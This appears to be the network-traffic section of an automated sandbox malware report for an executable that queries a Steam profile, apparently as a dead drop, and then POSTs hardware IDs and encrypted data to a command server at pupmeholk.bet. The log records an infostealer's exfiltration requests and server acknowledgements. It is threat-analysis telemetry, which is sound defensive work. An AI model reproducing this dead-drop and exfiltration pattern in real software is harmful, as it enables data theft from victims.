                                                                                                                                                                                                                                                  2025-03-17 00:04:18 UTC4245OUTData Raw: 3b 1e 01 e7 0a de 18 e5 ba 4d 87 d8 8b ff 09 df 3e a4 25 88 4e e6 e4 8f ab f8 92 a6 ce 6e 7d 36 20 af 3a ac 1e 84 1f e9 f4 6f d5 8a ca ad 2b 5d aa 0a d6 ad 5a 69 6e 63 fb 01 29 80 a5 cf 36 6a 10 46 ed f0 b3 80 d8 27 ee 7a c0 bf 25 4c 8c a3 a2 2c 83 19 aa 14 30 69 d4 dc cc 70 1a f2 56 7f 93 9b 3b 7f 4c cd d6 b1 6e 8e 98 8d 28 5e d0 db b7 dd 9f 36 a6 50 77 af 1e c2 85 97 24 ac e5 35 fa 7a 8f 81 5d b6 66 ba 67 2f df c9 b3 59 64 f6 55 b0 56 89 ca fd 84 e0 d8 7a 02 57 ef 06 cb b3 de 36 f3 63 2f 86 d2 7b 7e 41 38 71 ba 4a dc 8c ad 0c 42 ab 62 14 ef f3 5e 7f 88 e8 b9 13 ff c1 7c 8a 78 76 5d 3a 99 63 f0 be 9d 24 53 f3 1e b0 da d5 ad 8b da 59 2a 5b 6d dd 18 74 4b 30 72 0e 57 50 e3 d0 27 e8 46 f8 ef 38 fc 83 9a 2d 81 13 a3 09 89 3b b6 3e f8 bb 8a ff ce b2 c8 54 ff
                                                                                                                                                                                                                                                  Data Ascii: ;M>%Nn}6 :o+]Zinc)6jF'z%L,0ipV;Ln(^6Pw$5z]fg/YdUVzW6c/{~A8qJBb^|xv]:c$SY*[mtK0rWP'F8-;>T
                                                                                                                                                                                                                                                  2025-03-17 00:04:19 UTC814INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Mon, 17 Mar 2025 00:04:19 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VzOy%2F8biWoJMBr%2FqvAPEr64O9oB2Etug5PozFMKrysUGy4VVgvFTuwSUVRiUnK4TQ%2FFM66aFE0tOZrvRp7m7OkCmyUd%2FJkKQ0%2BQutc%2Fa8iljEI4sEbnHlZb8Za5qCtUw"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 92183b6f58c641e7-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2149&min_rtt=1594&rtt_var=994&sent=11&recv=24&lost=0&retrans=0&sent_bytes=2832&recv_bytes=20529&delivery_rate=1831869&cwnd=219&unsent_bytes=0&cid=45152de9ba07ab67&ts=662&x=0"
                                                                                                                                                                                                                                                  2025-03-17 00:04:19 UTC74INData Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d 7d 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 44{"success":{"message":"message success delivery from 8.46.123.189"}}
                                                                                                                                                                                                                                                  2025-03-17 00:04:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  5192.168.2.449729104.73.234.1024437384C:\Users\user\Desktop\12Kp1xbcjv.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-03-17 00:04:20 UTC94OUTGET /profiles/76561199822375128 HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Host: steamcommunity.com
                                                                                                                                                                                                                                                  2025-03-17 00:04:20 UTC1974INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                                                                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Date: Mon, 17 Mar 2025 00:04:20 GMT
                                                                                                                                                                                                                                                  Content-Length: 36132
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: sessionid=a899802bd8ae6e312cbe0390; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                  Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; path=/; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                  2025-03-17 00:04:20 UTC14410INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e
                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
                                                                                                                                                                                                                                                  2025-03-17 00:04:20 UTC16384INData Raw: 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 73 74 61 74 73 2f 22 3e 0a 09 09 09 09 09 09 53 74 61 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 73 75 70 65 72 6e 61 76 20 73 75 70 65 72 6e 61 76 5f 61 63 74 69 76 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 22 20 64 61 74 61 2d 74 6f 6f 6c 74 69 70 2d 74 79 70 65 3d 22 73 65 6c 65 63 74 6f 72 22
                                                                                                                                                                                                                                                  Data Ascii: </a><a class="submenuitem" href="https://store.steampowered.com/stats/">Stats</a></div><a class="menuitem supernav supernav_active" href="https://steamcommunity.com/" data-tooltip-type="selector"
                                                                                                                                                                                                                                                  2025-03-17 00:04:20 UTC3762INData Raw: 09 09 09 09 09 09 3c 64 69 76 20 69 64 3d 22 4e 61 6d 65 50 6f 70 75 70 41 6c 69 61 73 65 73 22 3e 0a 0a 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 20 69 64 3d 22 4e 61 6d 65 50 6f 70 75 70 43 6c 65 61 72 41 6c 69 61 73 65 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6c 65 61 72 3a 62 6f 74 68 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 5f 72 65 61 6c 5f 6e 61 6d 65 20 65
                                                                                                                                                                                                                                                  Data Ascii: <div id="NamePopupAliases"></div><div style="display:none" id="NamePopupClearAliases"></div><div style="clear:both"></div></div></div></div><div class="header_real_name e
                                                                                                                                                                                                                                                  2025-03-17 00:04:20 UTC1576INData Raw: 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 6c 65 67 61 63 79 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0a 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 5f 73 70 61 63 65 72 22 20 63 6c 61 73 73 3d 22 22 3e 3c 2f 64 69 76 3e 0a 09 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 5f 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 09 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 5f 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 73 70 61 6e 20 69 64 3d 22 66 6f 6f 74 65 72 4c 6f 67 6f 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 6d 6d 75 6e 69 74 79 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65
                                                                                                                                                                                                                                                  Data Ascii: ... responsive_page_legacy_content --><div id="footer_spacer" class=""></div><div id="footer_responsive_optin_spacer"></div><div id="footer"><div class="footer_content"><span id="footerLogo"><img src="https://community.cloudflare.ste


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  6192.168.2.449731104.21.32.14437384C:\Users\user\Desktop\12Kp1xbcjv.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-03-17 00:04:21 UTC272OUTPOST /pLoska HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=vMTy2o0fO
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 8733
                                                                                                                                                                                                                                                  Host: pupmeholk.bet
                                                                                                                                                                                                                                                  2025-03-17 00:04:21 UTC8733OUTData Raw: 2d 2d 76 4d 54 79 32 6f 30 66 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 30 36 31 30 32 61 36 33 36 61 38 63 34 61 34 33 33 32 63 38 34 33 63 38 62 62 34 63 39 30 65 30 66 31 33 61 39 61 62 30 37 64 0d 0a 2d 2d 76 4d 54 79 32 6f 30 66 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 76 4d 54 79 32 6f 30 66 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 34 39 46 34 32 44 33 34 36 34 36 33 30 44 34 38 43 39 41 31 43 34 32 45 37 42 33 46 32
                                                                                                                                                                                                                                                  Data Ascii: --vMTy2o0fOContent-Disposition: form-data; name="uid"06102a636a8c4a4332c843c8bb4c90e0f13a9ab07d--vMTy2o0fOContent-Disposition: form-data; name="pid"2--vMTy2o0fOContent-Disposition: form-data; name="hwid"549F42D3464630D48C9A1C42E7B3F2
                                                                                                                                                                                                                                                  2025-03-17 00:04:21 UTC804INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Mon, 17 Mar 2025 00:04:21 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JuGMDzepaSGSev9MNVw5HTd%2FFCVlAyvaRQQBBXeRsxzHvKTrZy7o0Nb8QyOObBCiarsRjVNZe6kTmn0TnQ%2FJPPlDGtgvgND2pUEWwztNfLj0sEvmIk7vzNPKWZm4bcQy"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 92183b810aa17ce8-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1962&min_rtt=1840&rtt_var=777&sent=7&recv=14&lost=0&retrans=0&sent_bytes=2830&recv_bytes=9663&delivery_rate=1586956&cwnd=210&unsent_bytes=0&cid=81026c6d78542de3&ts=508&x=0"
                                                                                                                                                                                                                                                  2025-03-17 00:04:21 UTC74INData Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d 7d 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 44{"success":{"message":"message success delivery from 8.46.123.189"}}
                                                                                                                                                                                                                                                  2025-03-17 00:04:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  7192.168.2.449732104.73.234.1024437384C:\Users\user\Desktop\12Kp1xbcjv.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-03-17 00:04:22 UTC94OUTGET /profiles/76561199822375128 HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Host: steamcommunity.com
                                                                                                                                                                                                                                                  2025-03-17 00:04:23 UTC1974INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                  Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED]
                                                                                                                                                                                                                                                  Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                  Date: Mon, 17 Mar 2025 00:04:22 GMT
                                                                                                                                                                                                                                                  Content-Length: 36132
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Set-Cookie: sessionid=0e4aa3bc766ffc70e75a3125; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                  Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; path=/; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                  2025-03-17 00:04:23 UTC14410INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 20 44 65 73 6b 74 6f 70 55 49 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e
                                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE html><html class=" responsive DesktopUI" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21">
                                                                                                                                                                                                                                                  2025-03-17 00:04:23 UTC16384INData Raw: 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 73 74 61 74 73 2f 22 3e 0a 09 09 09 09 09 09 53 74 61 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 73 75 70 65 72 6e 61 76 20 73 75 70 65 72 6e 61 76 5f 61 63 74 69 76 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 22 20 64 61 74 61 2d 74 6f 6f 6c 74 69 70 2d 74 79 70 65 3d 22 73 65 6c 65 63 74 6f 72 22
                                                                                                                                                                                                                                                  Data Ascii: </a><a class="submenuitem" href="https://store.steampowered.com/stats/">Stats</a></div><a class="menuitem supernav supernav_active" href="https://steamcommunity.com/" data-tooltip-type="selector"
                                                                                                                                                                                                                                                  2025-03-17 00:04:23 UTC3762INData Raw: 09 09 09 09 09 09 3c 64 69 76 20 69 64 3d 22 4e 61 6d 65 50 6f 70 75 70 41 6c 69 61 73 65 73 22 3e 0a 0a 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 22 20 69 64 3d 22 4e 61 6d 65 50 6f 70 75 70 43 6c 65 61 72 41 6c 69 61 73 65 73 22 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6c 65 61 72 3a 62 6f 74 68 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 2f 64 69 76 3e 0a 0a 09 09 09 09 09 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 65 61 64 65 72 5f 72 65 61 6c 5f 6e 61 6d 65 20 65
                                                                                                                                                                                                                                                  Data Ascii: <div id="NamePopupAliases"></div><div style="display:none" id="NamePopupClearAliases"></div><div style="clear:both"></div></div></div></div><div class="header_real_name e
                                                                                                                                                                                                                                                  2025-03-17 00:04:23 UTC1576INData Raw: 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 6c 65 67 61 63 79 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0a 0a 09 09 09 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 5f 73 70 61 63 65 72 22 20 63 6c 61 73 73 3d 22 22 3e 3c 2f 64 69 76 3e 0a 09 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 5f 72 65 73 70 6f 6e 73 69 76 65 5f 6f 70 74 69 6e 5f 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 09 3c 64 69 76 20 69 64 3d 22 66 6f 6f 74 65 72 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6f 6f 74 65 72 5f 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 09 3c 73 70 61 6e 20 69 64 3d 22 66 6f 6f 74 65 72 4c 6f 67 6f 22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 6d 6d 75 6e 69 74 79 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 73 74 65
                                                                                                                                                                                                                                                  Data Ascii: ... responsive_page_legacy_content --><div id="footer_spacer" class=""></div><div id="footer_responsive_optin_spacer"></div><div id="footer"><div class="footer_content"><span id="footerLogo"><img src="https://community.cloudflare.ste


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  8192.168.2.449734104.21.32.14437384C:\Users\user\Desktop\12Kp1xbcjv.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2025-03-17 00:04:23 UTC280OUTPOST /pLoska HTTP/1.1
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=2vr9fUz2mMhz3f8h
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  Content-Length: 20421
                                                                                                                                                                                                                                                  Host: pupmeholk.bet
                                                                                                                                                                                                                                                  2025-03-17 00:04:23 UTC15331OUTData Raw: 2d 2d 32 76 72 39 66 55 7a 32 6d 4d 68 7a 33 66 38 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 30 36 31 30 32 61 36 33 36 61 38 63 34 61 34 33 33 32 63 38 34 33 63 38 62 62 34 63 39 30 65 30 66 31 33 61 39 61 62 30 37 64 0d 0a 2d 2d 32 76 72 39 66 55 7a 32 6d 4d 68 7a 33 66 38 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 32 76 72 39 66 55 7a 32 6d 4d 68 7a 33 66 38 68 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 35 34 39 46 34 32 44 33 34
                                                                                                                                                                                                                                                  Data Ascii: --2vr9fUz2mMhz3f8hContent-Disposition: form-data; name="uid"06102a636a8c4a4332c843c8bb4c90e0f13a9ab07d--2vr9fUz2mMhz3f8hContent-Disposition: form-data; name="pid"3--2vr9fUz2mMhz3f8hContent-Disposition: form-data; name="hwid"549F42D34
                                                                                                                                                                                                                                                  2025-03-17 00:04:23 UTC5090OUTData Raw: 55 23 73 28 b1 68 0d 18 c9 fd 72 bc 18 4e 45 0c 81 e2 09 aa d4 5e 56 cc b8 15 c0 cf 87 15 39 9c 78 42 1d 7f 3b 64 aa 7b 67 31 0f f8 49 b1 69 ac 14 55 32 29 75 f5 31 31 fb 05 3c 35 66 6a 29 1c 69 0d 2c 32 62 be 65 73 7a 10 c1 60 c1 b3 3f 7e b4 0b da cc a4 ef db 21 c3 33 75 c8 cf 43 28 76 54 ce c9 b7 91 ed dc e0 2a 2f 48 61 a3 34 4a 5e 62 87 f2 38 c4 b0 c1 63 0e d0 44 b4 b0 8c 67 df ec b9 25 77 28 64 35 96 cf d8 58 8a 0c 28 85 d1 bc 03 d8 b5 e7 f6 94 03 ca b7 da 2b 19 18 82 76 af 52 ba 88 a4 b0 1f cd c9 ee b5 9c b0 89 12 81 fb ba 62 4c 65 93 ef 85 2c b4 e3 73 3c 03 c2 cc 60 cc 83 78 45 7a a9 78 6c fd d6 62 df 5c 17 2e c7 58 44 9f 94 5b dc e7 1f 39 ea 84 a4 8d a8 db 21 12 15 af ed 30 54 b5 d2 94 bb 88 dd 59 ae 48 99 d0 cc 40 92 94 ef b9 cf 07 ca 61 f3 c2 c6
                                                                                                                                                                                                                                                  Data Ascii: U#s(hrNE^V9xB;d{g1IiU2)u11<5fj)i,2besz`?~!3uC(vT*/Ha4J^b8cDg%w(d5X(+vRbLe,s<`xEzxlb\.XD[9!0TYH@a
                                                                                                                                                                                                                                                  2025-03-17 00:04:24 UTC807INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Mon, 17 Mar 2025 00:04:24 GMT
                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cGPBeZi%2BWD0zuAB2hVq9EpKpoa27i3jEOMi88sg4K1rJ%2BndV0TmLzBVSznOuspJke1BAYNDFkk6DND42X3t2rP3IjRUMRECYIXJRA3NACKxuDhlDD2cBcRjcHd%2B2D9OG"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 92183b901dcb7b0b-EWR
                                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
